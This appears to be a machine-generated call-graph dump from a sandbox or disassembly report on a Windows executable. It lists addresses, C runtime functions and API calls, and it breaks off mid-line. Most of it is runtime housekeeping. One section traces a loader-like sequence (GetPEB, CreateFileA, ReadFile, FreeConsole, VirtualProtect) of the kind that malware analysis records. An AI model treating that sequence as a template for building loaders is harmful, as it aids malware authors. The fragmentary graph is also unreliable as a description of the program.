10626->10590 10626->10591 10627->10618 10629 6ec14c 10628->10629 10636 6ec147 10628->10636 10630 6e8bb5 _unexpected 14 API calls 10629->10630 10640 6ec169 10630->10640 10631 6ec1d7 10632 6e6807 CallUnexpected 39 API calls 10631->10632 10634 6ec1dc 10632->10634 10633 6e8352 __freea 14 API calls 10633->10636 10635 6e62e6 __strnicoll 11 API calls 10634->10635 10637 6ec1e8 10635->10637 10636->10598 10638 6e8bb5 _unexpected 14 API calls 10638->10640 10639 6e8352 __freea 14 API calls 10639->10640 10640->10631 10640->10634 10640->10638 10640->10639 10641 6e6955 ___std_exception_copy 29 API calls 10640->10641 10642 6ec1c6 10640->10642 10641->10640 10642->10633 10644 6f133f 10643->10644 10645 6f1339 10643->10645 10661 6f1354 10644->10661 10647 6f256b 10645->10647 10648 6f2523 10645->10648 10681 6f2581 10647->10681 10650 6f2529 10648->10650 10654 6f2546 10648->10654 10653 6e8b05 __dosmaperr 14 API calls 10650->10653 10652 6f2539 10652->10601 10655 6f252e 10653->10655 10657 6e8b05 __dosmaperr 14 API calls 10654->10657 10659 6f2564 10654->10659 10656 6e62b9 __strnicoll 29 API calls 10655->10656 10656->10652 10658 6f2555 10657->10658 10660 6e62b9 __strnicoll 29 API calls 10658->10660 10659->10601 10660->10652 10662 6e7b4f __strnicoll 39 API calls 10661->10662 10663 6f136a 10662->10663 10664 6f1386 10663->10664 10665 6f139d 10663->10665 10667 6f134f 10663->10667 10666 6e8b05 __dosmaperr 14 API calls 10664->10666 10669 6f13b8 10665->10669 10670 6f13a6 10665->10670 10668 6f138b 10666->10668 10667->10601 10673 6e62b9 __strnicoll 29 API calls 10668->10673 10671 6f13d8 10669->10671 10672 6f13c5 10669->10672 10674 6e8b05 __dosmaperr 14 API calls 10670->10674 10699 6f264c 10671->10699 10676 6f2581 __strnicoll 39 API calls 10672->10676 10673->10667 10675 6f13ab 10674->10675 10678 6e62b9 __strnicoll 29 API calls 10675->10678 10676->10667 10678->10667 10680 6e8b05 __dosmaperr 14 API calls 10680->10667 10682 6f25ab 10681->10682 10683 6f2591 10681->10683 10685 6f25ca 10682->10685 10686 6f25b3 10682->10686 10684 6e8b05 __dosmaperr 14 API calls 10683->10684 10687 6f2596 10684->10687 10689 6f25ed 10685->10689 10690 6f25d6 10685->10690 10688 6e8b05 __dosmaperr 14 API calls 10686->10688 10691 6e62b9 __strnicoll 29 API calls 10687->10691 10692 6f25b8 10688->10692 10694 6e7b4f __strnicoll 39 API calls 10689->10694 10697 6f25a1 10689->10697 10693 6e8b05 __dosmaperr 14 API calls 10690->10693 10691->10697 10695 6e62b9 __strnicoll 29 API calls 10692->10695 10696 6f25db 10693->10696 10694->10697 10695->10697 10698 6e62b9 __strnicoll 29 API calls 10696->10698 10697->10652 10698->10697 10700 6e7b4f __strnicoll 39 API calls 10699->10700 10701 6f265f 10700->10701 10704 6f2692 10701->10704 10706 6f26c6 __strnicoll 10704->10706 10705 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10707 6f13ee 10705->10707 10708 6f2746 10706->10708 10709 6f292a 10706->10709 10711 6f2733 GetCPInfo 10706->10711 10715 6f274a 10706->10715 10707->10667 10707->10680 10710 6ea7ee __strnicoll MultiByteToWideChar 10708->10710 10708->10715 10712 6f27cc 10710->10712 10711->10708 10711->10715 10714 6e8cfd __strnicoll 15 API calls 10712->10714 10712->10715 10716 6f27f3 __alloca_probe_16 10712->10716 10719 6f291e 10712->10719 10713 6ea6cd __freea 14 API calls 10713->10715 10714->10716 10715->10705 10715->10709 10717 6ea7ee __strnicoll MultiByteToWideChar 10716->10717 10716->10719 10718 6f283f 10717->10718 10718->10719 10720 6ea7ee __strnicoll MultiByteToWideChar 10718->10720 10719->10713 10721 6f285b 10720->10721 10721->10719 10722 6f2869 10721->10722 10723 6f28cc 10722->10723 10725 6e8cfd __strnicoll 15 API calls 10722->10725 10728 6f2882 __alloca_probe_16 10722->10728 10724 6ea6cd __freea 14 API calls 10723->10724 10726 6f28d2 10724->10726 10725->10728 10727 6ea6cd __freea 14 API calls 10726->10727 10727->10715 10728->10723 10729 6ea7ee __strnicoll MultiByteToWideChar 10728->10729 10730 6f28c5 10729->10730 10730->10723 10731 6f28ee 10730->10731 10737 6e6d70 10731->10737 10734 6ea6cd __freea 14 API calls 10735 6f290e 10734->10735 10736 6ea6cd __freea 14 API calls 10735->10736 10736->10715 10738 6e714f __strnicoll 5 API calls 10737->10738 10739 6e6d7b 10738->10739 10740 6e6f74 __strnicoll 5 API calls 10739->10740 10742 6e6d81 10739->10742 10741 6e6dc1 CompareStringW 10740->10741 10741->10742 10742->10734 10744 6f1178 HeapSize 10743->10744 10745 6f1163 10743->10745 10744->10608 10746 6e8b05 __dosmaperr 14 API calls 10745->10746 10747 6f1168 10746->10747 10748 6e62b9 __strnicoll 29 API calls 10747->10748 10749 6f1173 10748->10749 10749->10608 10751 6f1198 10750->10751 10752 6f11a3 10750->10752 10754 6e8cfd __strnicoll 15 API calls 10751->10754 10753 6f11ab 10752->10753 10760 6f11b4 _unexpected 10752->10760 10755 6e8352 __freea 14 API calls 10753->10755 10758 6f11a0 10754->10758 10755->10758 10756 6f11de HeapReAlloc 10756->10758 10756->10760 10757 6f11b9 10759 6e8b05 __dosmaperr 14 API calls 10757->10759 10758->10612 10759->10758 10760->10756 10760->10757 10761 6e5761 _unexpected 2 API calls 10760->10761 10761->10760 10763 6e7b4f __strnicoll 39 API calls 10762->10763 10764 6eac86 10763->10764 10766 6eac98 10764->10766 10770 6e6d51 10764->10770 10767 6ead0c 10766->10767 10776 6eaee2 10767->10776 10773 6e7135 10770->10773 10774 6e70b0 _unexpected 5 API calls 10773->10774 10775 6e6d59 10774->10775 10775->10766 10777 6eaf0a 10776->10777 10778 6eaef0 10776->10778 10779 6eaf30 10777->10779 10780 6eaf11 10777->10780 10794 6eacf2 10778->10794 10782 6ea7ee __strnicoll MultiByteToWideChar 10779->10782 10793 6ead24 10780->10793 10798 6eacb3 10780->10798 10784 6eaf3f 10782->10784 10785 6eaf46 GetLastError 10784->10785 10787 6eacb3 15 API calls 10784->10787 10790 6eaf6c 10784->10790 10803 6e8b2b 10785->10803 10787->10790 10788 6ea7ee __strnicoll MultiByteToWideChar 10791 6eaf83 10788->10791 10790->10788 10790->10793 10791->10785 10791->10793 10792 6e8b05 __dosmaperr 14 API calls 10792->10793 10793->10618 10793->10619 10795 6eacfd 10794->10795 10797 6ead05 10794->10797 10796 6e8352 __freea 14 API calls 10795->10796 10796->10797 10797->10793 10799 6eacf2 14 API calls 10798->10799 10800 6eacc1 10799->10800 10808 6eac55 10800->10808 10811 6e8b18 10803->10811 10805 6e8b36 __dosmaperr 10806 6e8b05 __dosmaperr 14 API calls 10805->10806 10807 6e8b49 10806->10807 10807->10792 10809 6e8cfd __strnicoll 15 API calls 10808->10809 10810 6eac62 10809->10810 10810->10793 10812 6e73ef __dosmaperr 14 API calls 10811->10812 10813 6e8b1d 10812->10813 10813->10805 10819 6e15c1 GetPEB 10814->10819 10817 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10818 6e1de6 10817->10818 10818->9809 10841 6e1098 10819->10841 10822 6e162d GetFileSize 10824 6e17b1 CloseHandle 10822->10824 10825 6e1641 10822->10825 10823 6e17d5 10826 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10823->10826 10824->10823 10828 6e1649 ReadFile 10825->10828 10827 6e17e3 10826->10827 10827->10817 10829 6e17a8 10828->10829 10830 6e1666 CloseHandle 10828->10830 10829->10824 10831 6e17a6 10830->10831 10840 6e167d CatchGuardHandler 10830->10840 10852 6e1511 10831->10852 10833 6e17ed 10884 6e17fd 10833->10884 10835 6e17f2 10886 6e62c9 10835->10886 10840->10831 10840->10833 10840->10835 10864 6e1807 10840->10864 10870 6e1930 10840->10870 10846 6e10c1 CatchGuardHandler 10841->10846 10851 6e120e 10841->10851 10842 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10843 6e1227 CreateFileA 10842->10843 10843->10822 10843->10823 10844 6e1231 10845 6e17fd 31 API calls 10844->10845 10847 6e1236 10845->10847 10846->10844 10846->10847 10848 6e1807 32 API calls 10846->10848 10849 6e1930 21 API calls 10846->10849 10846->10851 10850 6e62c9 29 API calls 10847->10850 10848->10846 10849->10846 10850->10847 10851->10842 10853 6e1098 32 API calls 10852->10853 10854 6e1537 FreeConsole 10853->10854 10891 6e123b 10854->10891 10857 6e123b 77 API calls 10858 6e156e 10857->10858 10859 6e1098 32 API calls 10858->10859 10860 6e1581 VirtualProtect 10859->10860 10861 6e1592 10860->10861 10862 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10861->10862 10863 6e15b7 10862->10863 10863->10823 10865 6e1828 10864->10865 10866 6e1810 10864->10866 10868 6e182d 31 API calls 10865->10868 10867 6e1930 21 API calls 10866->10867 10869 6e1819 10867->10869 10868->10865 10869->10840 10873 6e1935 10870->10873 10871 6e6728 ___std_exception_copy 15 API calls 10871->10873 10872 6e194f 10872->10840 10873->10871 10873->10872 10874 6e5761 _unexpected 2 API calls 10873->10874 10876 6e1951 10873->10876 10874->10873 10875 6e1ae6 10877 6e277e CallUnexpected RaiseException 10875->10877 10876->10875 10878 6e277e CallUnexpected RaiseException 10876->10878 10879 6e1b03 IsProcessorFeaturePresent 10877->10879 10878->10875 10881 6e1b19 10879->10881 10998 6e1bff SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10881->10998 10883 6e1bfc 10883->10840 10999 6e1a10 10884->10999 10887 6e6508 __strnicoll 29 API calls 10886->10887 10888 6e62d8 10887->10888 10889 6e62e6 __strnicoll 11 API calls 10888->10889 10890 6e62e5 10889->10890 10904 6e1263 CatchGuardHandler 10891->10904 10892 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10893 6e14a7 10892->10893 10893->10857 10894 6e13b7 KiUserExceptionDispatcher CloseFigure 10894->10904 10895 6e14b2 10911 6e182d 10895->10911 10897 6e14b7 10901 6e62c9 29 API calls 10897->10901 10898 6e146c 10898->10897 10902 6e148a 10898->10902 10899 6e1807 32 API calls 10899->10904 10900 6e1930 21 API calls 10900->10904 10901->10897 10902->10892 10904->10894 10904->10895 10904->10897 10904->10898 10904->10899 10904->10900 10904->10902 10905 6e14bc 10904->10905 10906 6e14df 10905->10906 10916 6e3686 10906->10916 10908 6e14f8 10909 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10908->10909 10910 6e1508 10909->10910 10910->10904 10977 6e277e 10911->10977 10913 6e1851 10980 6e29a9 10913->10980 10917 6e369a __strnicoll 10916->10917 10918 6e36bc 10917->10918 10920 6e36e3 10917->10920 10919 6e6462 __strnicoll 29 API calls 10918->10919 10922 6e36d7 __strnicoll 10919->10922 10923 6e4e3d 10920->10923 10922->10908 10924 6e4e49 ___scrt_is_nonwritable_in_current_image 10923->10924 10931 6e3486 EnterCriticalSection 10924->10931 10926 6e4e57 10932 6e4812 10926->10932 10931->10926 10946 6e89de 10932->10946 10934 6e4839 10953 6e3c61 10934->10953 10941 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10942 6e48ac 10941->10942 10943 6e4e8c 10942->10943 10976 6e349a LeaveCriticalSection 10943->10976 10945 6e4e75 10945->10922 10947 6e8a89 29 API calls 10946->10947 10948 6e89ef 10947->10948 10949 6e8a51 10948->10949 10950 6e8cfd __strnicoll 15 API calls 10948->10950 10949->10934 10951 6e8a48 10950->10951 10952 6e8352 __freea 14 API calls 10951->10952 10952->10949 10954 6e3bc3 29 API calls 10953->10954 10955 6e3c7c 10954->10955 10956 6e3c87 10955->10956 10958 6e3ca4 10955->10958 10964 6e3caf 10955->10964 10957 6e6462 __strnicoll 29 API calls 10956->10957 10957->10958 10969 6e3991 10958->10969 10959 6e3f89 70 API calls 10959->10964 10960 6e40e2 70 API calls 10960->10964 10961 6e38c0 ___scrt_uninitialize_crt 39 API calls 10961->10964 10962 6e3f11 29 API calls 10962->10964 10963 6e3b22 66 API calls 10963->10964 10964->10958 10964->10959 10964->10960 10964->10961 10964->10962 10964->10963 10965 6e3ea3 10964->10965 10966 6e6462 __strnicoll 29 API calls 10965->10966 10967 6e3ebd 10966->10967 10968 6e6462 __strnicoll 29 API calls 10967->10968 10968->10958 10970 6e8352 __freea 14 API calls 10969->10970 10971 6e39a1 10970->10971 10972 6e8ac7 10971->10972 10973 6e8ad2 10972->10973 10974 6e489a 10972->10974 10973->10974 10975 6e879c ___scrt_uninitialize_crt 64 API calls 10973->10975 10974->10941 10975->10974 10976->10945 10978 6e27c6 RaiseException 10977->10978 10979 6e2798 10977->10979 10978->10913 10979->10978 10981 6e29b6 10980->10981 10987 6e1874 10980->10987 10981->10981 10981->10987 10988 6e6728 10981->10988 10984 6e29e3 10995 6e670d 10984->10995 10985 6e6955 ___std_exception_copy 29 API calls 10985->10984 10987->10897 10993 6e8cfd _unexpected 10988->10993 10989 6e8d3b 10990 6e8b05 __dosmaperr 14 API calls 10989->10990 10992 6e29d3 10990->10992 10991 6e8d26 RtlAllocateHeap 10991->10992 10991->10993 10992->10984 10992->10985 10993->10989 10993->10991 10994 6e5761 _unexpected 2 API calls 10993->10994 10994->10993 10996 6e8352 __freea 14 API calls 10995->10996 10997 6e6725 10996->10997 10997->10987 10998->10883 11006 6e1a78 10999->11006 11002 6e277e CallUnexpected RaiseException 11003 6e1a2f 11002->11003 11009 6e18b6 11003->11009 11012 6e19b2 11006->11012 11010 6e29a9 ___std_exception_copy 30 API calls 11009->11010 11011 6e18d8 11010->11011 11013 6e29a9 ___std_exception_copy 30 API calls 11012->11013 11014 6e19de 11013->11014 11014->11002 11016 6e55b9 11015->11016 11017 6e55a7 11015->11017 11027 6e5714 11016->11027 11018 6e21e4 __CreateFrameInfo GetModuleHandleW 11017->11018 11020 6e55ac 11018->11020 11020->11016 11042 6e54ae GetModuleHandleExW 11020->11042 11022 6e1e65 11022->9824 11026 6e560b 11028 6e5720 ___scrt_is_nonwritable_in_current_image 11027->11028 11048 6e720f EnterCriticalSection 11028->11048 11030 6e572a 11049 6e5611 11030->11049 11032 6e5737 11053 6e5755 11032->11053 11035 6e5549 11078 6e5530 11035->11078 11037 6e5553 11038 6e5567 11037->11038 11039 6e5557 GetCurrentProcess TerminateProcess 11037->11039 11040 6e54ae __CreateFrameInfo 3 API calls 11038->11040 11039->11038 11041 6e556f ExitProcess 11040->11041 11043 6e550e 11042->11043 11044 6e54ed GetProcAddress 11042->11044 11045 6e551d 11043->11045 11046 6e5514 FreeLibrary 11043->11046 11044->11043 11047 6e5501 11044->11047 11045->11016 11046->11045 11047->11043 11048->11030 11051 6e561d ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 11049->11051 11050 6e5681 __CreateFrameInfo 11050->11032 11051->11050 11056 6e5cbb 11051->11056 11077 6e7226 LeaveCriticalSection 11053->11077 11055 6e55f0 11055->11022 11055->11035 11057 6e5cc7 __EH_prolog3 11056->11057 11060 6e5f46 11057->11060 11059 6e5cee __CreateFrameInfo 11059->11050 11061 6e5f52 ___scrt_is_nonwritable_in_current_image 11060->11061 11068 6e720f EnterCriticalSection 11061->11068 11063 6e5f60 11069 6e5e11 11063->11069 11068->11063 11070 6e5e28 11069->11070 11071 6e5e30 11069->11071 11073 6e5f95 11070->11073 11071->11070 11072 6e8352 __freea 14 API calls 11071->11072 11072->11070 11076 6e7226 LeaveCriticalSection 11073->11076 11075 6e5f7e 11075->11059 11076->11075 11077->11055 11081 6ea04a 11078->11081 11080 6e5535 __CreateFrameInfo 11080->11037 11082 6ea059 __CreateFrameInfo 11081->11082 11083 6ea066 11082->11083 11085 6e6fa5 11082->11085 11083->11080 11086 6e70b0 _unexpected 5 API calls 11085->11086 11087 6e6fc1 11086->11087 11087->11083 11089 6e3404 11088->11089 11092 6e3416 ___scrt_uninitialize_crt 11088->11092 11090 6e3412 11089->11090 11093 6e872e 11089->11093 11090->9817 11092->9817 11096 6e8859 11093->11096 11099 6e8932 11096->11099 11100 6e893e ___scrt_is_nonwritable_in_current_image 11099->11100 11107 6e720f EnterCriticalSection 11100->11107 11102 6e89b4 11116 6e89d2 11102->11116 11106 6e8948 ___scrt_uninitialize_crt 11106->11102 11108 6e88a6 11106->11108 11107->11106 11109 6e88b2 ___scrt_is_nonwritable_in_current_image 11108->11109 11119 6e3486 EnterCriticalSection 11109->11119 11111 6e88bc ___scrt_uninitialize_crt 11115 6e88f5 11111->11115 11120 6e8737 11111->11120 11131 6e8926 11115->11131 11232 6e7226 LeaveCriticalSection 11116->11232 11118 6e8735 11118->11090 11119->11111 11121 6e874c __strnicoll 11120->11121 11122 6e875e 11121->11122 11123 6e8753 11121->11123 11134 6e879c 11122->11134 11124 6e8859 ___scrt_uninitialize_crt 68 API calls 11123->11124 11128 6e8759 __strnicoll 11124->11128 11128->11115 11129 6e877f 11147 6eca36 11129->11147 11231 6e349a LeaveCriticalSection 11131->11231 11133 6e8914 11133->11106 11135 6e8768 11134->11135 11136 6e87b5 11134->11136 11135->11128 11140 6e9ecf 11135->11140 11136->11135 11137 6e9ecf ___scrt_uninitialize_crt 29 API calls 11136->11137 11138 6e87d1 11137->11138 11158 6ecd71 11138->11158 11141 6e9edb 11140->11141 11142 6e9ef0 11140->11142 11143 6e8b05 __dosmaperr 14 API calls 11141->11143 11142->11129 11144 6e9ee0 11143->11144 11145 6e62b9 __strnicoll 29 API calls 11144->11145 11146 6e9eeb 11145->11146 11146->11129 11148 6eca47 11147->11148 11149 6eca54 11147->11149 11151 6e8b05 __dosmaperr 14 API calls 11148->11151 11150 6eca9d 11149->11150 11153 6eca7b 11149->11153 11152 6e8b05 __dosmaperr 14 API calls 11150->11152 11157 6eca4c 11151->11157 11154 6ecaa2 11152->11154 11201 6ecab3 11153->11201 11156 6e62b9 __strnicoll 29 API calls 11154->11156 11156->11157 11157->11128 11159 6ecd7d ___scrt_is_nonwritable_in_current_image 11158->11159 11160 6ecdbe 11159->11160 11162 6ece04 11159->11162 11168 6ecd85 11159->11168 11161 6e6462 __strnicoll 29 API calls 11160->11161 11161->11168 11169 6ec432 EnterCriticalSection 11162->11169 11164 6ece0a 11165 6ece28 11164->11165 11170 6ecb55 11164->11170 11198 6ece7a 11165->11198 11168->11135 11169->11164 11171 6ecb7d 11170->11171 11197 6ecba0 ___scrt_uninitialize_crt 11170->11197 11172 6ecb81 11171->11172 11174 6ecbdc 11171->11174 11173 6e6462 __strnicoll 29 API calls 11172->11173 11173->11197 11175 6ecbfa 11174->11175 11176 6f1550 ___scrt_uninitialize_crt 31 API calls 11174->11176 11177 6ece82 ___scrt_uninitialize_crt 40 API calls 11175->11177 11176->11175 11178 6ecc0c 11177->11178 11179 6ecc59 11178->11179 11180 6ecc12 11178->11180 11181 6ecc6d 11179->11181 11182 6eccc2 WriteFile 11179->11182 11183 6ecc1a 11180->11183 11184 6ecc41 11180->11184 11185 6eccae 11181->11185 11186 6ecc75 11181->11186 11187 6ecce4 GetLastError 11182->11187 11196 6ecc54 11182->11196 11191 6ed2c6 ___scrt_uninitialize_crt 6 API calls 11183->11191 11183->11197 11188 6eceff ___scrt_uninitialize_crt 45 API calls 11184->11188 11192 6ed32e ___scrt_uninitialize_crt 7 API calls 11185->11192 11189 6ecc9a 11186->11189 11190 6ecc7a 11186->11190 11187->11196 11188->11196 11194 6ed4f2 ___scrt_uninitialize_crt 8 API calls 11189->11194 11193 6ecc83 11190->11193 11190->11197 11191->11197 11192->11197 11195 6ed409 ___scrt_uninitialize_crt 7 API calls 11193->11195 11194->11196 11195->11197 11196->11197 11197->11165 11199 6ec455 ___scrt_uninitialize_crt LeaveCriticalSection 11198->11199 11200 6ece80 11199->11200 11200->11168 11202 6ecabf ___scrt_is_nonwritable_in_current_image 11201->11202 11214 6ec432 EnterCriticalSection 11202->11214 11204 6ecace 11205 6ecb13 11204->11205 11215 6ec1e9 11204->11215 11207 6e8b05 __dosmaperr 14 API calls 11205->11207 11209 6ecb1a 11207->11209 11208 6ecafa FlushFileBuffers 11208->11209 11210 6ecb06 GetLastError 11208->11210 11228 6ecb49 11209->11228 11211 6e8b18 __dosmaperr 14 API calls 11210->11211 11211->11205 11214->11204 11216 6ec20b 11215->11216 11217 6ec1f6 11215->11217 11220 6e8b18 __dosmaperr 14 API calls 11216->11220 11222 6ec230 11216->11222 11218 6e8b18 __dosmaperr 14 API calls 11217->11218 11219 6ec1fb 11218->11219 11221 6e8b05 __dosmaperr 14 API calls 11219->11221 11223 6ec23b 11220->11223 11224 6ec203 11221->11224 11222->11208 11225 6e8b05 __dosmaperr 14 API calls 11223->11225 11224->11208 11226 6ec243 11225->11226 11227 6e62b9 __strnicoll 29 API calls 11226->11227 11227->11224 11229 6ec455 ___scrt_uninitialize_crt LeaveCriticalSection 11228->11229 11230 6ecb32 11229->11230 11230->11157 11231->11133 11232->11118 11503 6e5860 11506 6e5887 11503->11506 11507 6e5893 ___scrt_is_nonwritable_in_current_image 11506->11507 11514 6e720f EnterCriticalSection 11507->11514 11509 6e58cb 11515 6e58e9 11509->11515 11510 6e589d 11510->11509 11512 6eabfa __strnicoll 14 API calls 11510->11512 11512->11510 11514->11510 11518 6e7226 LeaveCriticalSection 11515->11518 11517 6e5885 11518->11517 11519 6e3576 11520 6e872e ___scrt_uninitialize_crt 68 API calls 11519->11520 11521 6e357e 11520->11521 11529 6e8c12 11521->11529 11523 6e3583 11539 6e8cbd 11523->11539 11526 6e35ad 11527 6e8352 __freea 14 API calls 11526->11527 11528 6e35b8 11527->11528 11530 6e8c1e ___scrt_is_nonwritable_in_current_image 11529->11530 11543 6e720f EnterCriticalSection 11530->11543 11532 6e8c95 11548 6e8cb4 11532->11548 11534 6e8c69 DeleteCriticalSection 11537 6e8352 __freea 14 API calls 11534->11537 11538 6e8c29 11537->11538 11538->11532 11538->11534 11544 6ed67a 11538->11544 11540 6e3592 DeleteCriticalSection 11539->11540 11541 6e8cd4 11539->11541 11540->11523 11540->11526 11541->11540 11542 6e8352 __freea 14 API calls 11541->11542 11542->11540 11543->11538 11545 6ed68d __strnicoll 11544->11545 11551 6ed738 11545->11551 11547 6ed699 __strnicoll 11547->11538 11623 6e7226 LeaveCriticalSection 11548->11623 11550 6e8ca1 11550->11523 11552 6ed744 ___scrt_is_nonwritable_in_current_image 11551->11552 11553 6ed74e 11552->11553 11554 6ed771 11552->11554 11555 6e6462 __strnicoll 29 API calls 11553->11555 11561 6ed769 11554->11561 11562 6e3486 EnterCriticalSection 11554->11562 11555->11561 11557 6ed78f 11563 6ed6aa 11557->11563 11559 6ed79c 11577 6ed7c7 11559->11577 11561->11547 11562->11557 11564 6ed6da 11563->11564 11565 6ed6b7 11563->11565 11567 6e879c ___scrt_uninitialize_crt 64 API calls 11564->11567 11568 6ed6d2 11564->11568 11566 6e6462 __strnicoll 29 API calls 11565->11566 11566->11568 11569 6ed6f2 11567->11569 11568->11559 11570 6e8cbd 14 API calls 11569->11570 11571 6ed6fa 11570->11571 11572 6e9ecf ___scrt_uninitialize_crt 29 API calls 11571->11572 11573 6ed706 11572->11573 11580 6f181b 11573->11580 11576 6e8352 __freea 14 API calls 11576->11568 11622 6e349a LeaveCriticalSection 11577->11622 11579 6ed7cd 11579->11561 11582 6f1844 11580->11582 11584 6ed70d 11580->11584 11581 6f1893 11583 6e6462 __strnicoll 29 API calls 11581->11583 11582->11581 11585 6f186b 11582->11585 11583->11584 11584->11568 11584->11576 11587 6f18be 11585->11587 11588 6f18ca ___scrt_is_nonwritable_in_current_image 11587->11588 11595 6ec432 EnterCriticalSection 11588->11595 11590 6f1909 11609 6f1943 11590->11609 11591 6f18d8 11591->11590 11596 6f177b 11591->11596 11595->11591 11597 6ec1e9 ___scrt_uninitialize_crt 29 API calls 11596->11597 11599 6f178b 11597->11599 11598 6f1791 11612 6ec253 11598->11612 11599->11598 11600 6f17c3 11599->11600 11602 6ec1e9 ___scrt_uninitialize_crt 29 API calls 11599->11602 11600->11598 11603 6ec1e9 ___scrt_uninitialize_crt 29 API calls 11600->11603 11604 6f17ba 11602->11604 11605 6f17cf CloseHandle 11603->11605 11606 6ec1e9 ___scrt_uninitialize_crt 29 API calls 11604->11606 11605->11598 11607 6f17db GetLastError 11605->11607 11606->11600 11607->11598 11608 6f17e9 ___scrt_uninitialize_crt 11608->11590 11621 6ec455 LeaveCriticalSection 11609->11621 11611 6f192c 11611->11584 11613 6ec2c9 11612->11613 11614 6ec262 11612->11614 11615 6e8b05 __dosmaperr 14 API calls 11613->11615 11614->11613 11620 6ec28c 11614->11620 11616 6ec2ce 11615->11616 11617 6e8b18 __dosmaperr 14 API calls 11616->11617 11618 6ec2b9 11617->11618 11618->11608 11619 6ec2b3 SetStdHandle 11619->11618 11620->11618 11620->11619 11621->11611 11622->11579 11623->11550 11665 6e7543 11666 6e754e 11665->11666 11667 6e755e 11665->11667 11671 6e7648 11666->11671 11670 6e8352 __freea 14 API calls 11670->11667 11672 6e765d 11671->11672 11673 6e7663 11671->11673 11675 6e8352 __freea 14 API calls 11672->11675 11674 6e8352 __freea 14 API calls 11673->11674 11676 6e766f 11674->11676 11675->11673 11677 6e8352 __freea 14 API calls 11676->11677 11678 6e767a 11677->11678 11679 6e8352 __freea 14 API calls 11678->11679 11680 6e7685 11679->11680 11681 6e8352 __freea 14 API calls 11680->11681 11682 6e7690 11681->11682 11683 6e8352 __freea 14 API calls 11682->11683 11684 6e769b 11683->11684 11685 6e8352 __freea 14 API calls 11684->11685 11686 6e76a6 11685->11686 11687 6e8352 __freea 14 API calls 11686->11687 11688 6e76b1 11687->11688 11689 6e8352 __freea 14 API calls 11688->11689 11690 6e76bc 11689->11690 11691 6e8352 __freea 14 API calls 11690->11691 11692 6e76ca 11691->11692 11697 6e77c1 11692->11697 11698 6e77cd ___scrt_is_nonwritable_in_current_image 11697->11698 11713 6e720f EnterCriticalSection 11698->11713 11702 6e77d7 11703 6e8352 __freea 14 API calls 11702->11703 11704 6e7801 11702->11704 11703->11704 11714 6e7820 11704->11714 11705 6e782c 11706 6e7838 ___scrt_is_nonwritable_in_current_image 11705->11706 11718 6e720f EnterCriticalSection 11706->11718 11708 6e7842 11709 6e7564 _unexpected 14 API calls 11708->11709 11710 6e7855 11709->11710 11719 6e7875 11710->11719 11713->11702 11717 6e7226 LeaveCriticalSection 11714->11717 11716 6e76f0 11716->11705 11717->11716 11718->11708 11722 6e7226 LeaveCriticalSection 11719->11722 11721 6e7556 11721->11670 11722->11721 11756 6e7f29 11759 6e7226 LeaveCriticalSection 11756->11759 11758 6e7f30 11759->11758 11236 6e1e27 11237 6e21e4 __CreateFrameInfo GetModuleHandleW 11236->11237 11238 6e1e2f 11237->11238 11239 6e1e65 11238->11239 11241 6e1e33 11238->11241 11240 6e5445 __CreateFrameInfo 21 API calls 11239->11240 11242 6e1e6d 11240->11242 11244 6e1e3e 11241->11244 11245 6e546a 11241->11245 11246 6e557a __CreateFrameInfo 21 API calls 11245->11246 11247 6e5475 11246->11247 11247->11244 11760 6e1c27 11761 6e1c2f 11760->11761 11779 6e669a 11761->11779 11763 6e1c3a 11786 6e1fff 11763->11786 11765 6e1c4f __RTC_Initialize 11777 6e1cac 11765->11777 11792 6e1e78 11765->11792 11766 6e2237 4 API calls 11767 6e1cd1 11766->11767 11769 6e1c68 11795 6e58f5 11769->11795 11773 6e1c7e 11828 6e217c 11773->11828 11775 6e1ca1 11834 6e57fe 11775->11834 11777->11766 11778 6e1cc9 11777->11778 11780 6e66cc 11779->11780 11781 6e66a9 11779->11781 11780->11763 11781->11780 11782 6e8b05 __dosmaperr 14 API calls 11781->11782 11783 6e66bc 11782->11783 11784 6e62b9 __strnicoll 29 API calls 11783->11784 11785 6e66c7 11784->11785 11785->11763 11787 6e200f 11786->11787 11788 6e200b 11786->11788 11789 6e2237 4 API calls 11787->11789 11791 6e201c ___scrt_release_startup_lock 11787->11791 11788->11765 11790 6e2085 11789->11790 11791->11765 11841 6e1e8d 11792->11841 11796 6e594f 11795->11796 11797 6e5987 11796->11797 11798 6e5971 11796->11798 11819 6e1c73 11796->11819 11799 6e7b07 49 API calls 11797->11799 11800 6e8b05 __dosmaperr 14 API calls 11798->11800 11801 6e598d 11799->11801 11802 6e5976 11800->11802 11876 6eb478 GetModuleFileNameW 11801->11876 11804 6e62b9 __strnicoll 29 API calls 11802->11804 11804->11819 11810 6e59e9 11812 6e8b05 __dosmaperr 14 API calls 11810->11812 11811 6e59f5 11813 6e5a8c 39 API calls 11811->11813 11814 6e59ee 11812->11814 11815 6e5a0b 11813->11815 11817 6e8352 __freea 14 API calls 11814->11817 11815->11814 11816 6e5a2f 11815->11816 11898 6eac4a 11816->11898 11817->11819 11819->11777 11827 6e216d InitializeSListHead 11819->11827 11821 6e5a46 11823 6e8352 __freea 14 API calls 11821->11823 11822 6e5a50 11825 6e8352 __freea 14 API calls 11822->11825 11824 6e5a4e 11823->11824 11826 6e8352 __freea 14 API calls 11824->11826 11825->11824 11826->11819 11827->11773 12125 6e5c00 11828->12125 11830 6e2194 11830->11775 11831 6e218d 11831->11830 11832 6e2237 4 API calls 11831->11832 11833 6e219c 11832->11833 11833->11775 11835 6e729e _unexpected 39 API calls 11834->11835 11836 6e5809 11835->11836 11837 6e5841 11836->11837 11838 6e8b05 __dosmaperr 14 API calls 11836->11838 11837->11777 11839 6e5836 11838->11839 11840 6e62b9 __strnicoll 29 API calls 11839->11840 11840->11837 11842 6e1e9c 11841->11842 11843 